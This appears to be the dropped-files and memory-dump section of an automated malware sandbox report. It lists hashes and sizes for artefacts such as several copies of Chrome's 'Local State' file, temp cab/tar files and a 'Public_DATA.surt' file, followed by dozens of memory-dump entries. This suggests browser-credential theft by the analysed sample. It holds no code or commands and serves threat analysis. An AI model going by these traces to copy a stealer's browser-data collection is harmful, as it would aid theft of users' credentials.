MD5
9a7d64d6c24770755609383a08faefc5

SHA1
408f7c3db6a26255f13dbb606466867f9d03f26f

SHA256
b4c5a59d8ffa398019e8d0d5b12380d43a3e6f2fa874da72c6f6cadcf3b1d850

SHA512
2e48994ba0285f1ddeec51a278c9353b5736ed65a6a859f7b7d9cec317584489669e628ea761f91bfb5dbea7ba442f4983c0debf4d5973df1a0b0dfcd09f3f35

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
345KB

MD5
88c4fc6363ca5e7ae1aa3a84afebafc3

SHA1
a0b6ae5262c3ef2dfccaa6a0e942123139eafb67

SHA256
44853cd1c4755909c3fd54ab4c2d1e54d6a4714e287793827ff2f221f000814c

SHA512
a2f5600b366db8a9caa6f8a46d1e014c3c698bbb9018734ea08e16685e3d8532d25a977d604e17fbbd3270ed90e2ab1cd1022611fdb288d0717e6e371df2396d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
346KB

MD5
a7d0a315e94158b3b39032d9e3c24d48

SHA1
6b3c1f70581b3814302bff358f425e2178d05fb6

SHA256
d10d20035b3ebcbd62cff5e8cfc522d73f17e3f7246c141b46b5b366199dd646

SHA512
e5f9d3a210de4db011d397e7d618075f48c94cf29fa6c524560d66c76f52878af0cd6867f1545baf3b53b8abe86292688b342720be2c7231ad444da490cba2d3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
345KB

MD5
820e398b3060cbce8b79314867f95136

SHA1
9817f2bd72f3f73f768bbad7e930de0a9cf8cd58

SHA256
7a804e87b57b544624900775ad8bd013a39210ee2f61199569ce42324ae17eb9

SHA512
1970e30e3aa6cce07f3a1f3b4f52ad4f32cf1201457991bdff5d0ee5ad1d3f4af9df6f55c60ac84d501ddea6427ffa7d1645fa36c81146a5907f342b512b42a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
363KB

MD5
87443065e10252a4431ed06b2e64eb3c

SHA1
6a63ac76ae2de313fc0b3569d67e315ed21788d2

SHA256
f8bf80b231b91422fae05498c3d18e8b413dc82b017b4b7fb80bdc9545d03cf2

SHA512
c7a6b6d8ba9bb9809560a885b146f3f009480a42982c2f8709efb73149b2a26fd504a6b5d39f2b0e32bf5cde6217c7cf91791ed4be7718c9c57870d07fa973ad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
170KB

MD5
f596da5d8097a9a6eca3b07acf1b116c

SHA1
16cf6234f0322cd78bd50bed0e42f75da2872e84

SHA256
e6423a6f4c20e3b389cde6a178b1aecdf195c19b05b99330be84c4ff7c46067f

SHA512
c956a072ad4df100bdc76c7a54bb8d7dbedb3df767b7584db7fb4b56cf176fa9048a676e7dc7dc824ff76655fd22e25380e6cef4e6ca1ec8b5a55d518c4df9ce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
170KB

MD5
a0ff1c84e93ed5b56bb9af3398be3c44

SHA1
534de8c0ef5b537c83c40f8d324b290f2cc9b6be

SHA256
64602c4d5c0781ad0b8d4606290115ab04c3ba28af1f34100942a623d115e33a

SHA512
e58c602dfb3a7131ac734151361f157d4db14fd747f1a9a9a95af769c9ded68d28622b5875afc745ea17f68dbfaff24c5fb515def5081ed81f28163196df0a72

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
345KB

MD5
6b90545e0711466e95f8a8c7b4d1ce21

SHA1
142a692775169454a3dc74e31023cb8e318e0a60

SHA256
96fd37a7185e7c9ef956a99530b0aabaf7cb01e531291d0869bea99afe0b5e46

SHA512
06358fb8df77769a66ad558ea3da3c49423a262306fdc7aad2e5e2646e2417bf391df0d5f0d2e07446b7fe9f6a10e47d27101ec797c5245e76c6ad995177370c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
345KB

MD5
f71d70ef9c84295e9067da531597f87b

SHA1
0afa532e1fb408b83526051564b9cb6d6cfc59eb

SHA256
74fac2ca0bb31ad53aed502b45e0f0be0321f8319b61e20269f321c9e695a705

SHA512
7549b71b8c7926d51d8d3a11e334031e4187d88f86ad3cf7b08d72f328476c5921b307e6940d7d66e9d4be1d77b4adfea14e8786baf462df234f668c3dca8dcf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
86B

MD5
f732dbed9289177d15e236d0f8f2ddd3

SHA1
53f822af51b014bc3d4b575865d9c3ef0e4debde

SHA256
2741df9ee9e9d9883397078f94480e9bc1d9c76996eec5cfe4e77929337cbe93

SHA512
b64e5021f32e26c752fcba15a139815894309b25644e74ceca46a9aa97070bca3b77ded569a9bfd694193d035ba75b61a8d6262c8e6d5c4d76b452b38f5150a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
86B

MD5
e9e365607374115b92e4abe4b9628101

SHA1
d5054ea9b22317dca83801eb3586017bfcc0e2a8

SHA256
5cd2c4d9f13524923046198c92213691539407e04fa520cdae9eade1bad3d91d

SHA512
a84d65ed53e43883e5ecb7848fbd48f5305a63e6975e6af480cf85532879720061106be54f2a5888ebc3569f7123081a0e6eb48ccb8d7dba3e1da1c8a3c50401

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
85B

MD5
0e16444393cd322124146935ab837ecc

SHA1
aa1a3e9571e3e067421d940601965220711f24ad

SHA256
1b5de2bf736e2bb182cf64bd8a72bbbd6538a9f33dc8020223b2257bad6f7d82

SHA512
26c461b0493c5e0f26aa196ce94c0c9ea5d892220ebe882af4bf2892469515e9b13056ef7ae0f9c429f45c14f334299ccffa5bab1547b3da0e2fce45131630a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\c13ec490-c705-400d-9164-d111c120c780.tmp

Filesize
369KB

MD5
09544c48cca547a371cc66ce14f2a280

SHA1
d3cc0cf236e8359661ac4eae576133673b63115d

SHA256
a49e1bb83657679ae41b70924bf2cb34c03fc5f039f80d27b6e5f5e65a00ed9c

SHA512
561625ea38f34d3287c62fd9331a2895a5e0e04412918e4b6c2b008540d386d2b07cc031310a014c78f89d0514752af3ef55b0710a83844683cd67437618ad4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ea0807fd-c232-4f52-a0b1-a346fbf96137.tmp

Filesize
170KB

MD5
8f1fece6136ba5b1e918ad4a13647c1d

SHA1
3308870cdba5cf22d80df483392bb1849055c77b

SHA256
cae90b4c49a5c7c19a2ab0c74e7424a63a420d53fe83465a9f05e49f000d79c9

SHA512
000e9e0b9aa32cb24ee554e23ea739c84e993fc29bf5bac09d7ecf582809534dee06093389e29de897ac532a72c62a30467bb8121d6887b289d147f8784225da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab951F.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Public_DATA.surt

Filesize
204B

MD5
3b4e660a9d2f515a3d46f2d98318f319

SHA1
e9fa583157ce6dd58279715a65fbd4e834b55da7

SHA256
188898a899271eaf1824b673112d842fedd9995539be38305010e17efc1e58bd

SHA512
7fa82a90d3c7fa180bdeb1ae93f8fcc97561589bf6a37888b8f6f17f1cc25ff789c63e6505df72a789c4a3443daf5ac3733779395a64b97a3aee8d5b922fdde3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar962D.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
memory/2504-53-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-0-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-37-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-12-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-1-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-114-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-56-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-35-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-7-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-58-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-60-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-63-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-3-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-62-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-61-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-59-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-57-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-55-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-44-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-45-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-46-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-47-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-48-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-6-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-49-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-50-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-9-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-51-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-8-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-4-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

Filesize
4KB

Download
memory/2504-52-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-21-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-5-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-33-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-54-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-40-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-41-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-42-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-43-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-39-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-10-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-15-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-17-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-19-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-23-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-25-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-27-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-29-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-16-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-20-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-22-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-24-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-28-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-30-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-32-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-1470-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-34-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-36-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-26-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-18-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2504-31-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download